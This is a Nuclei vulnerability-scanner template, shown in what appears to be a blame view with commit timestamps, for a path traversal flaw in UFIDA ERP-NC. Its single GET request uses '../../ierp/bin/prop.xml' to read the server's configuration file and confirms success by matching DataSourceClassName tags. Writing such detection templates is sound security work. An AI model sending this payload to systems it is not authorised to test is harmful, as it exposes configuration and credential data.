nuclei-templates/vulnerabilities/other/wooyun-path-traversal.yaml

29 lines
800 B
YAML
Raw Normal View History

2021-01-30 21:37:05 +00:00
id: wooyun-path-traversal
info:
2021-01-31 07:24:53 +00:00
name: Wooyun Path Traversal
2021-01-30 21:37:05 +00:00
author: pikpikcu
severity: high
reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
description: |
A general document of UFIDA ERP-NC contains a vulnerability
(affecting a large number of well-known school government and enterprise cases
such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo)
tags: lfi
2021-01-30 21:37:05 +00:00
requests:
- method: GET
path:
2021-01-31 07:24:53 +00:00
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml"
2021-01-30 21:37:05 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
2021-01-31 07:24:53 +00:00
- <DataSourceClassName>
- </DataSourceClassName>
2021-01-30 21:37:05 +00:00
part: body
2021-01-31 07:24:53 +00:00
condition: and